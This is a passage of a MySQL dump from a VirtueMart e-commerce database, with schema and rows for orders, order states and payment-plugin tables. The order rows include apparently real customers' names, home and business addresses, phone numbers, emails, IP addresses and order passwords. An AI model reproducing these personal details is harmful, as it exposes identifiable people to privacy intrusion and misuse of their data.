07:08:53',677,'0000-00-00 00:00:00',0),(6,6,677,'BT',NULL,'DMB Elektronik A.S.','Mr','Enunlu','Ahmet',NULL,'0212 482 8606',NULL,'0212 482 8424','Davutpaşa Caddesi, Serçekale Sokak 10/1, Topkapi 34010',NULL,'Zeytinburnu',0,215,'034010','info@dmb-elektronik.com',0,'2014-08-08 07:10:26',677,'2014-08-08 07:10:26',677,'0000-00-00 00:00:00',0),(7,6,677,'ST',NULL,'DMB Elektronik A.S.',NULL,'Enunlu','Ahmet',NULL,'0212 482 8606',NULL,'0212 482 8424','Davutpaşa Caddesi, Serçekale Sokak 10/1, Topkapi 34010',NULL,'Zeytinburnu',0,215,'034010',NULL,0,'2014-08-08 07:10:26',677,'2014-08-08 07:10:26',677,'0000-00-00 00:00:00',0),(8,7,677,'BT',NULL,'DMB Elektronik A.S.','Mr','Enunlu','Ahmet',NULL,'0212 482 8606',NULL,'0212 482 8424','Davutpaşa Caddesi, Serçekale Sokak 10/1, Topkapi 34010',NULL,'Zeytinburnu',0,215,'034010','info@dmb-elektronik.com',0,'2014-08-08 07:11:11',677,'2014-08-08 07:11:11',677,'0000-00-00 00:00:00',0),(9,7,677,'ST',NULL,'DMB Elektronik A.S.',NULL,'Enunlu','Ahmet',NULL,'0212 482 8606',NULL,'0212 482 8424','Davutpaşa Caddesi, Serçekale Sokak 10/1, Topkapi 34010',NULL,'Zeytinburnu',0,215,'034010',NULL,0,'2014-08-08 07:11:11',677,'2014-08-08 07:11:11',677,'0000-00-00 00:00:00',0),(10,8,677,'BT',NULL,'DMB Elektronik A.S.','Mr','Enunlu','Ahmet',NULL,'0212 482 8606',NULL,'0212 482 8424','Davutpaşa Caddesi, Serçekale Sokak 10/1, Topkapi 34010',NULL,'Zeytinburnu',0,215,'034010','info@dmb-elektronik.com',0,'2014-08-08 07:11:40',677,'2014-08-08 07:11:40',677,'0000-00-00 00:00:00',0),(11,8,677,'ST',NULL,'DMB Elektronik A.S.',NULL,'Enunlu','Ahmet',NULL,'0212 482 8606',NULL,'0212 482 8424','Davutpaşa Caddesi, Serçekale Sokak 10/1, Topkapi 34010',NULL,'Zeytinburnu',0,215,'034010',NULL,0,'2014-08-08 07:11:40',677,'2014-08-08 07:11:40',677,'0000-00-00 00:00:00',0),(12,9,677,'BT',NULL,'DMB Elektronik A.S.','Mr','Enunlu','Ahmet',NULL,'0212 482 8606',NULL,'0212 482 8424','Davutpaşa Caddesi, Serçekale Sokak 10/1, Topkapi 34010',NULL,'Zeytinburnu',0,215,'034010','info@dmb-elektronik.com',0,'2014-08-08 07:12:14',677,'2014-08-08 07:12:14',677,'0000-00-00 00:00:00',0),(13,9,677,'ST',NULL,'DMB Elektronik A.S.',NULL,'Enunlu','Ahmet',NULL,'0212 482 8606',NULL,'0212 482 8424','Davutpaşa Caddesi, Serçekale Sokak 10/1, Topkapi 34010',NULL,'Zeytinburnu',0,215,'034010',NULL,0,'2014-08-08 07:12:14',677,'2014-08-08 07:12:14',677,'0000-00-00 00:00:00',0),(14,10,677,'BT',NULL,'DMB Elektronik A.S.','Mr','Enunlu','Ahmet',NULL,'0212 482 8606',NULL,'0212 482 8424','Davutpaşa Caddesi, Serçekale Sokak 10/1, Topkapi 34010',NULL,'Zeytinburnu',0,215,'034010','info@dmb-elektronik.com',0,'2014-08-08 07:13:15',677,'2014-08-08 07:13:15',677,'0000-00-00 00:00:00',0),(15,10,677,'ST',NULL,'DMB Elektronik A.S.',NULL,'Enunlu','Ahmet',NULL,'0212 482 8606',NULL,'0212 482 8424','Davutpaşa Caddesi, Serçekale Sokak 10/1, Topkapi 34010',NULL,'Zeytinburnu',0,215,'034010',NULL,0,'2014-08-08 07:13:15',677,'2014-08-08 07:13:15',677,'0000-00-00 00:00:00',0),(16,11,677,'BT',NULL,'DMB Elektronik A.S.','Mr','Enunlu','Ahmet',NULL,'0212 482 8606',NULL,'0212 482 8424','Davutpaşa Caddesi, Serçekale Sokak 10/1, Topkapi 34010',NULL,'Zeytinburnu',0,215,'034010','info@dmb-elektronik.com',0,'2014-08-08 07:15:34',677,'2014-08-08 07:15:34',677,'0000-00-00 00:00:00',0),(17,12,677,'BT',NULL,'DMB Elektronik A.S.','Mr','Enunlu','Ahmet',NULL,'0212 482 8606',NULL,'0212 482 8424','Davutpaşa Caddesi, Serçekale Sokak 10/1, Topkapi 34010',NULL,'Zeytinburnu',0,215,'034010','info@dmb-elektronik.com',0,'2014-08-08 07:16:25',677,'2014-08-08 07:16:25',677,'0000-00-00 00:00:00',0),(18,12,677,'ST',NULL,'DMB Elektronik A.S.',NULL,'Enunlu','Ahmet',NULL,'0212 482 8606',NULL,'0212 482 8424','Davutpaşa Caddesi, Serçekale Sokak 10/1, Topkapi 34010',NULL,'Zeytinburnu',0,215,'034010',NULL,0,'2014-08-08 07:16:25',677,'2014-08-08 07:16:25',677,'0000-00-00 00:00:00',0),(19,13,677,'BT',NULL,'DMB Elektronik A.S.','Mr','Enunlu','Ahmet',NULL,'0212 482 8606',NULL,'0212 482 8424','Davutpaşa Caddesi, Serçekale Sokak 10/1, Topkapi 34010',NULL,'Zeytinburnu',0,215,'034010','info@dmb-elektronik.com',0,'2014-08-08 07:16:57',677,'2014-08-08 07:16:57',677,'0000-00-00 00:00:00',0),(20,14,0,'BT',NULL,NULL,NULL,'dgdgd','dgdgdg',NULL,NULL,NULL,NULL,'dgdgdg',NULL,'gdgdgd',560,81,'3465','terter@hotmail.com',1,'2019-08-06 12:15:14',0,'2019-08-06 12:15:14',0,'0000-00-00 00:00:00',0),(21,15,0,'BT',NULL,NULL,'Mr','ÖZTAŞ','KIYASETTİN',NULL,NULL,NULL,NULL,'HÜRRİYET MAHALLESİ FIRAT CADDESİS ÜSTÜNEL APARTMANI 39/B',NULL,'MELİKGAZİ',0,215,'38050','kiyasettinoztas@outlook.com',1,'2020-02-13 11:02:04',0,'2020-02-13 11:02:04',0,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `fz6t4_virtuemart_order_userinfos` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_orders`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_orders`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_orders` (
  `virtuemart_order_id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_user_id` int unsigned NOT NULL DEFAULT '0',
  `virtuemart_vendor_id` int unsigned NOT NULL DEFAULT '0',
  `order_note` varchar(5000) DEFAULT NULL,
  `order_number` varchar(64) DEFAULT NULL,
  `customer_number` varchar(32) DEFAULT NULL,
  `order_pass` varchar(34) DEFAULT NULL,
  `order_create_invoice_pass` varchar(32) DEFAULT NULL,
  `invoice_locked` tinyint(1) NOT NULL DEFAULT '0',
  `order_total` decimal(15,5) NOT NULL DEFAULT '0.00000',
  `order_salesPrice` decimal(15,5) NOT NULL DEFAULT '0.00000',
  `order_billTaxAmount` decimal(15,5) NOT NULL DEFAULT '0.00000',
  `order_billTax` varchar(400) DEFAULT NULL,
  `order_billDiscountAmount` decimal(15,5) NOT NULL DEFAULT '0.00000',
  `order_discountAmount` decimal(15,5) NOT NULL DEFAULT '0.00000',
  `order_subtotal` decimal(15,5) DEFAULT NULL,
  `order_tax` decimal(12,5) DEFAULT NULL,
  `order_shipment` decimal(12,5) DEFAULT NULL,
  `order_shipment_tax` decimal(10,5) DEFAULT NULL,
  `order_payment` decimal(12,2) DEFAULT NULL,
  `order_payment_tax` decimal(10,5) DEFAULT NULL,
  `coupon_discount` decimal(12,2) NOT NULL DEFAULT '0.00',
  `coupon_code` varchar(32) DEFAULT NULL,
  `order_discount` decimal(12,2) NOT NULL DEFAULT '0.00',
  `order_currency` smallint DEFAULT NULL,
  `order_status` char(1) DEFAULT NULL,
  `user_currency_id` smallint DEFAULT NULL,
  `user_currency_rate` decimal(12,6) NOT NULL DEFAULT '1.000000',
  `user_shoppergroups` varchar(30) DEFAULT NULL,
  `payment_currency_id` smallint DEFAULT NULL,
  `payment_currency_rate` decimal(12,6) NOT NULL DEFAULT '1.000000',
  `virtuemart_paymentmethod_id` int unsigned DEFAULT NULL,
  `virtuemart_shipmentmethod_id` int unsigned DEFAULT NULL,
  `oc_note` text NOT NULL COMMENT 'old customer notes',
  `delivery_date` varchar(200) DEFAULT NULL,
  `order_language` varchar(7) DEFAULT NULL,
  `ip_address` char(15) NOT NULL DEFAULT '',
  `STsameAsBT` tinyint(1) NOT NULL DEFAULT '0',
  `paid` decimal(15,5) NOT NULL DEFAULT '0.00000',
  `paid_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `o_hash` varchar(33) DEFAULT NULL,
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_order_id`),
  KEY `virtuemart_user_id` (`virtuemart_user_id`),
  KEY `virtuemart_vendor_id` (`virtuemart_vendor_id`),
  KEY `order_number` (`order_number`),
  KEY `virtuemart_paymentmethod_id` (`virtuemart_paymentmethod_id`),
  KEY `virtuemart_shipmentmethod_id` (`virtuemart_shipmentmethod_id`),
  KEY `created_on` (`created_on`)
) ENGINE=InnoDB AUTO_INCREMENT=16 DEFAULT CHARSET=utf8mb3 COMMENT='Used to store all orders';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_orders`
--

LOCK TABLES `fz6t4_virtuemart_orders` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_orders` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_orders` VALUES (1,677,1,NULL,'41a603','DMefa0e2f9c','p_54c0f',NULL,0,9500.00000,9500.00000,0.00000,'0',0.00000,0.00000,9500.00000,0.00000,0.00000,0.00000,0.00,0.00000,0.00,NULL,0.00,144,'P',139,2.163660,NULL,NULL,1.000000,1,1,'',NULL,'tr-TR','88.249.243.244',0,0.00000,'0000-00-00 00:00:00',NULL,'2014-08-07 06:45:52',677,'2014-08-07 06:45:52',677,'0000-00-00 00:00:00',0),(2,677,1,NULL,'d29404','DMefa0e2f9c','p_7b5a4',NULL,0,396.82692,396.82692,60.53292,'{\"1\":{\"virtuemart_calc_id\":1,\"calc_name\":\"KDV_18\",\"calc_value\":\"18.0000\",\"result\":60.53292}}',0.00000,0.00000,336.29400,60.53292,0.00000,0.00000,0.00,0.00000,0.00,NULL,0.00,144,'U',144,1.000000,NULL,NULL,1.000000,2,2,'','Fatura tarihi ile aynı','tr-TR','88.249.243.244',0,0.00000,'0000-00-00 00:00:00',NULL,'2014-08-07 08:17:57',677,'2014-08-07 08:17:57',677,'0000-00-00 00:00:00',0),(3,677,1,NULL,'706405','DMefa0e2f9c','p_a9927',NULL,0,573.19444,573.19444,87.43644,'{\"1\":{\"virtuemart_calc_id\":1,\"calc_name\":\"KDV_18\",\"calc_value\":\"18.0000\",\"result\":87.4364399999999}}',0.00000,0.00000,485.75800,87.43644,0.00000,0.00000,0.00,0.00000,0.00,NULL,0.00,144,'U',144,1.000000,NULL,NULL,1.000000,2,1,'','Fatura tarihi ile aynı','tr-TR','88.249.243.244',0,0.00000,'0000-00-00 00:00:00',NULL,'2014-08-07 08:41:55',677,'2014-08-07 08:41:55',677,'0000-00-00 00:00:00',0),(4,677,1,NULL,'630406','DMefa0e2f9c','p_20059',NULL,0,56.68956,56.68956,8.64756,'{\"1\":{\"virtuemart_calc_id\":1,\"calc_name\":\"KDV_18\",\"calc_value\":\"18.0000\",\"result\":8.64756}}',0.00000,0.00000,48.04200,8.64756,0.00000,0.00000,0.00,0.00000,0.00,NULL,0.00,144,'X',144,1.000000,NULL,NULL,1.000000,3,2,'','Fatura tarihi ile aynı','tr-TR','78.188.219.196',0,0.00000,'0000-00-00 00:00:00',NULL,'2014-08-08 07:07:48',677,'2014-08-08 07:08:44',677,'0000-00-00 00:00:00',0),(5,677,1,NULL,'9f7b07','DMefa0e2f9c','p_b5b54',NULL,0,56.68956,56.68956,8.64756,'{\"1\":{\"virtuemart_calc_id\":1,\"calc_name\":\"KDV_18\",\"calc_value\":\"18.0000\",\"result\":8.64756}}',0.00000,0.00000,48.04200,8.64756,0.00000,0.00000,0.00,0.00000,0.00,NULL,0.00,144,'P',139,2.163660,NULL,NULL,1.000000,1,2,'',NULL,'tr-TR','78.188.219.196',0,0.00000,'0000-00-00 00:00:00',NULL,'2014-08-08 07:08:53',677,'2014-08-08 07:08:53',677,'0000-00-00 00:00:00',0),(6,677,1,NULL,'166c08','DMefa0e2f9c','p_e41cb',NULL,0,56.68956,56.68956,8.64756,'{\"1\":{\"virtuemart_calc_id\":1,\"calc_name\":\"KDV_18\",\"calc_value\":\"18.0000\",\"result\":8.64756}}',0.00000,0.00000,48.04200,8.64756,0.00000,0.00000,0.00,0.00000,0.00,NULL,0.00,144,'P',139,2.163660,NULL,NULL,1.000000,1,2,'',NULL,'tr-TR','78.188.219.196',0,0.00000,'0000-00-00 00:00:00',NULL,'2014-08-08 07:10:26',677,'2014-08-08 07:10:26',677,'0000-00-00 00:00:00',0),(7,677,1,NULL,'e8c009','DMefa0e2f9c','p_b45e7',NULL,0,56.68956,56.68956,8.64756,'{\"1\":{\"virtuemart_calc_id\":1,\"calc_name\":\"KDV_18\",\"calc_value\":\"18.0000\",\"result\":8.64756}}',0.00000,0.00000,48.04200,8.64756,0.00000,0.00000,0.00,0.00000,0.00,NULL,0.00,144,'P',139,2.163660,NULL,NULL,1.000000,1,2,'',NULL,'tr-TR','78.188.219.196',0,0.00000,'0000-00-00 00:00:00',NULL,'2014-08-08 07:11:11',677,'2014-08-08 07:11:11',677,'0000-00-00 00:00:00',0),(8,677,1,NULL,'d844010','DMefa0e2f9c','p_5314e',NULL,0,56.68956,56.68956,8.64756,'{\"1\":{\"virtuemart_calc_id\":1,\"calc_name\":\"KDV_18\",\"calc_value\":\"18.0000\",\"result\":8.64756}}',0.00000,0.00000,48.04200,8.64756,0.00000,0.00000,0.00,0.00000,0.00,NULL,0.00,144,'P',139,2.163660,NULL,NULL,1.000000,1,2,'',NULL,'tr-TR','78.188.219.196',0,0.00000,'0000-00-00 00:00:00',NULL,'2014-08-08 07:11:40',677,'2014-08-08 07:11:40',677,'0000-00-00 00:00:00',0),(9,677,1,NULL,'acf5011','DMefa0e2f9c','p_67949',NULL,0,56.68956,56.68956,8.64756,'{\"1\":{\"virtuemart_calc_id\":1,\"calc_name\":\"KDV_18\",\"calc_value\":\"18.0000\",\"result\":8.64756}}',0.00000,0.00000,48.04200,8.64756,0.00000,0.00000,0.00,0.00000,0.00,NULL,0.00,144,'P',139,2.163660,NULL,NULL,1.000000,1,2,'',NULL,'tr-TR','78.188.219.196',0,0.00000,'0000-00-00 00:00:00',NULL,'2014-08-08 07:12:14',677,'2014-08-08 07:12:14',677,'0000-00-00 00:00:00',0),(10,677,1,NULL,'241b012','DMefa0e2f9c','p_dc7e1',NULL,0,56.68956,56.68956,8.64756,'{\"1\":{\"virtuemart_calc_id\":1,\"calc_name\":\"KDV_18\",\"calc_value\":\"18.0000\",\"result\":8.64756}}',0.00000,0.00000,48.04200,8.64756,0.00000,0.00000,0.00,0.00000,0.00,NULL,0.00,144,'P',144,1.000000,NULL,NULL,1.000000,3,2,'',NULL,'tr-TR','78.188.219.196',0,0.00000,'0000-00-00 00:00:00',NULL,'2014-08-08 07:13:15',677,'2014-08-08 07:13:15',677,'0000-00-00 00:00:00',0),(11,677,1,NULL,'4448013','DMefa0e2f9c','p_305f4',NULL,0,204.71230,204.71230,31.22730,'{\"1\":{\"virtuemart_calc_id\":1,\"calc_name\":\"KDV_18\",\"calc_value\":\"18.0000\",\"result\":31.2273}}',0.00000,0.00000,173.48500,31.22730,0.00000,0.00000,0.00,0.00000,0.00,NULL,0.00,144,'P',139,2.163660,NULL,NULL,1.000000,1,2,'',NULL,'tr-TR','78.188.219.196',0,0.00000,'0000-00-00 00:00:00',NULL,'2014-08-08 07:15:34',677,'2014-08-08 07:15:34',677,'0000-00-00 00:00:00',0),(12,677,1,NULL,'b6cb014','DMefa0e2f9c','p_81921',NULL,0,204.71230,204.71230,31.22730,'{\"1\":{\"virtuemart_calc_id\":1,\"calc_name\":\"KDV_18\",\"calc_value\":\"18.0000\",\"result\":31.2273}}',0.00000,0.00000,173.48500,31.22730,0.00000,0.00000,0.00,0.00000,0.00,NULL,0.00,144,'P',144,1.000000,NULL,NULL,1.000000,3,2,'',NULL,'tr-TR','78.188.219.196',0,0.00000,'0000-00-00 00:00:00',NULL,'2014-08-08 07:16:25',677,'2014-08-08 07:16:25',677,'0000-00-00 00:00:00',0),(13,677,1,NULL,'06df015','DMefa0e2f9c','p_0d434',NULL,0,204.71230,204.71230,31.22730,'{\"1\":{\"virtuemart_calc_id\":1,\"calc_name\":\"KDV_18\",\"calc_value\":\"18.0000\",\"result\":31.2273}}',0.00000,0.00000,173.48500,31.22730,0.00000,0.00000,0.00,0.00000,0.00,NULL,0.00,144,'P',144,1.000000,NULL,NULL,1.000000,3,2,'',NULL,'tr-TR','78.188.219.196',0,0.00000,'0000-00-00 00:00:00',NULL,'2014-08-08 07:16:57',677,'2014-08-08 07:16:57',677,'0000-00-00 00:00:00',0),(14,0,1,NULL,'G6NQ016','nonreg_dgdgte20190806_121514_','p_6EknUBLH','o9D1RmXM',0,0.00000,0.00000,0.00000,'0',0.00000,0.00000,0.00000,0.00000,0.00000,0.00000,0.00,0.00000,0.00,NULL,0.00,144,'P',144,1.000000,'1',NULL,1.000000,0,1,'',NULL,'tr-TR','46.154.224.xx',0,0.00000,'0000-00-00 00:00:00',NULL,'2019-08-06 12:15:14',0,'2019-08-06 12:15:14',0,'0000-00-00 00:00:00',0),(15,0,1,NULL,'AUQ3017','nonreg_KIÖZki20200213_110204_','p_wrUNWonG','nYbim6sY',0,0.00000,0.00000,0.00000,'0',0.00000,0.00000,0.00000,0.00000,0.00000,0.00000,0.00,0.00000,0.00,NULL,0.00,144,'P',144,1.000000,'1',144,1.000000,3,1,'',NULL,'tr-TR','92.45.189.xx',1,0.00000,'0000-00-00 00:00:00','a5b89ed930199cdedd3ae02f6c5e097e','2020-02-13 11:02:04',0,'2020-02-13 11:02:04',0,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `fz6t4_virtuemart_orders` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_orderstates`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_orderstates`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_orderstates` (
  `virtuemart_orderstate_id` tinyint unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_vendor_id` int unsigned NOT NULL DEFAULT '1',
  `order_status_code` char(1) NOT NULL DEFAULT '',
  `order_status_name` varchar(64) DEFAULT NULL,
  `order_status_color` varchar(64) DEFAULT NULL,
  `order_status_description` varchar(15359) DEFAULT NULL,
  `order_stock_handle` char(1) NOT NULL DEFAULT 'A',
  `ordering` int NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_orderstate_id`),
  KEY `ordering` (`ordering`),
  KEY `virtuemart_vendor_id` (`virtuemart_vendor_id`),
  KEY `published` (`published`)
) ENGINE=MyISAM AUTO_INCREMENT=9 DEFAULT CHARSET=utf8mb3 COMMENT='All available order statuses';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_orderstates`
--

LOCK TABLES `fz6t4_virtuemart_orderstates` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_orderstates` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_orderstates` VALUES (1,1,'P','COM_VIRTUEMART_ORDER_STATUS_PENDING',NULL,'','R',1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(2,1,'U','COM_VIRTUEMART_ORDER_STATUS_CONFIRMED_BY_SHOPPER',NULL,'','R',2,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(3,1,'C','COM_VIRTUEMART_ORDER_STATUS_CONFIRMED',NULL,'','R',3,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(4,1,'X','COM_VIRTUEMART_ORDER_STATUS_CANCELLED',NULL,'','A',4,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(5,1,'R','COM_VIRTUEMART_ORDER_STATUS_REFUNDED',NULL,'','A',5,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(6,1,'S','COM_VIRTUEMART_ORDER_STATUS_SHIPPED',NULL,'','O',6,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(7,1,'F','COM_VIRTUEMART_ORDER_STATUS_COMPLETED',NULL,'','R',7,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(8,1,'D','COM_VIRTUEMART_ORDER_STATUS_DENIED','','','A',8,1,'0000-00-00 00:00:00',0,'2017-11-05 11:35:42',676,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `fz6t4_virtuemart_orderstates` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_payment_plg_authorizenet`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_payment_plg_authorizenet`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_payment_plg_authorizenet` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_order_id` int unsigned DEFAULT NULL,
  `order_number` char(64) DEFAULT NULL,
  `virtuemart_paymentmethod_id` mediumint unsigned DEFAULT NULL,
  `payment_name` varchar(5000) DEFAULT NULL,
  `payment_order_total` decimal(15,5) NOT NULL,
  `payment_currency` smallint DEFAULT NULL,
  `return_context` char(255) DEFAULT NULL,
  `cost_per_transaction` decimal(10,2) DEFAULT NULL,
  `cost_percent_total` char(10) DEFAULT NULL,
  `tax_id` smallint DEFAULT NULL,
  `authorizenet_response_authorization_code` char(10) DEFAULT NULL,
  `authorizenet_response_transaction_id` char(128) DEFAULT NULL,
  `authorizenet_response_response_code` char(128) DEFAULT NULL,
  `authorizenet_response_response_subcode` char(13) DEFAULT NULL,
  `authorizenet_response_response_reason_code` decimal(10,2) DEFAULT NULL,
  `authorizenet_response_response_reason_text` text,
  `authorizenet_response_transaction_type` char(50) DEFAULT NULL,
  `authorizenet_response_account_number` char(4) DEFAULT NULL,
  `authorizenet_response_card_type` char(128) DEFAULT NULL,
  `authorizenet_response_card_code_response` char(5) DEFAULT NULL,
  `authorizenet_response_cavv_response` char(1) DEFAULT NULL,
  `authorizeresponse_raw` text,
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COMMENT='Payment AuthorizeNet Table';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_payment_plg_authorizenet`
--

LOCK TABLES `fz6t4_virtuemart_payment_plg_authorizenet` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_payment_plg_authorizenet` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_virtuemart_payment_plg_authorizenet` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_payment_plg_epos`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_payment_plg_epos`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_payment_plg_epos` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_order_id` int unsigned DEFAULT NULL,
  `order_number` char(64) DEFAULT NULL,
  `virtuemart_paymentmethod_id` mediumint unsigned DEFAULT NULL,
  `payment_name` varchar(5000) DEFAULT NULL,
  `return_context` char(255) DEFAULT NULL,
  `cost_per_transaction` decimal(10,2) DEFAULT NULL,
  `cost_percent_total` char(10) DEFAULT NULL,
  `tax_id` smallint DEFAULT NULL,
  `epos_response_authorization_code` char(10) DEFAULT NULL,
  `epos_response_transaction_id` mediumint unsigned DEFAULT NULL,
  `epos_response_response_code` char(128) DEFAULT NULL,
  `epos_response_response_subcode` char(13) DEFAULT NULL,
  `epos_response_response_reason_code` decimal(10,2) DEFAULT NULL,
  `epos_response_response_reason_text` text,
  `epos_response_transaction_type` char(50) DEFAULT NULL,
  `epos_response_account_number` char(4) DEFAULT NULL,
  `epos_response_card_type` char(128) DEFAULT NULL,
  `epos_response_card_code_response` char(5) DEFAULT NULL,
  `epos_response_cavv_response` char(1) DEFAULT NULL,
  `authorizeresponse_raw` text,
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COMMENT='Payment epos Table';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_payment_plg_epos`
--

LOCK TABLES `fz6t4_virtuemart_payment_plg_epos` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_payment_plg_epos` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_virtuemart_payment_plg_epos` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_payment_plg_paypal`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_payment_plg_paypal`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_payment_plg_paypal` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_order_id` int unsigned DEFAULT NULL,
  `order_number` char(64) DEFAULT NULL,
  `virtuemart_paymentmethod_id` mediumint unsigned DEFAULT NULL,
  `payment_name` varchar(5000) DEFAULT NULL,
  `payment_order_total` decimal(15,5) NOT NULL,
  `payment_currency` smallint DEFAULT NULL,
  `email_currency` smallint DEFAULT NULL,
  `cost_per_transaction` decimal(10,2) DEFAULT NULL,
  `cost_percent_total` decimal(10,2) DEFAULT NULL,
  `tax_id` smallint DEFAULT NULL,
  `paypal_custom` varchar(255) DEFAULT NULL,
  `paypal_method` varchar(200) DEFAULT NULL,
  `paypal_response_mc_gross` decimal(10,2) DEFAULT NULL,
  `paypal_response_mc_currency` char(10) DEFAULT NULL,
  `paypal_response_invoice` char(32) DEFAULT NULL,
  `paypal_response_protection_eligibility` char(128) DEFAULT NULL,
  `paypal_response_payer_id` char(13) DEFAULT NULL,
  `paypal_response_tax` decimal(10,2) DEFAULT NULL,
  `paypal_response_payment_date` char(28) DEFAULT NULL,
  `paypal_response_payment_status` char(50) DEFAULT NULL,
  `paypal_response_pending_reason` char(50) DEFAULT NULL,
  `paypal_response_mc_fee` decimal(10,2) DEFAULT NULL,
  `paypal_response_payer_email` char(128) DEFAULT NULL,
  `paypal_response_last_name` char(64) DEFAULT NULL,
  `paypal_response_first_name` char(64) DEFAULT NULL,
  `paypal_response_business` char(128) DEFAULT NULL,
  `paypal_response_receiver_email` char(128) DEFAULT NULL,
  `paypal_response_transaction_subject` char(128) DEFAULT NULL,
  `paypal_response_residence_country` char(2) DEFAULT NULL,
  `paypal_response_txn_id` char(32) DEFAULT NULL,
  `paypal_response_txn_type` char(32) DEFAULT NULL,
  `paypal_response_parent_txn_id` char(32) DEFAULT NULL,
  `paypal_response_case_creation_date` char(32) DEFAULT NULL,
  `paypal_response_case_id` char(32) DEFAULT NULL,
  `paypal_response_case_type` char(32) DEFAULT NULL,
  `paypal_response_reason_code` char(32) DEFAULT NULL,
  `paypalresponse_raw` varchar(512) DEFAULT NULL,
  `paypal_fullresponse` text,
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
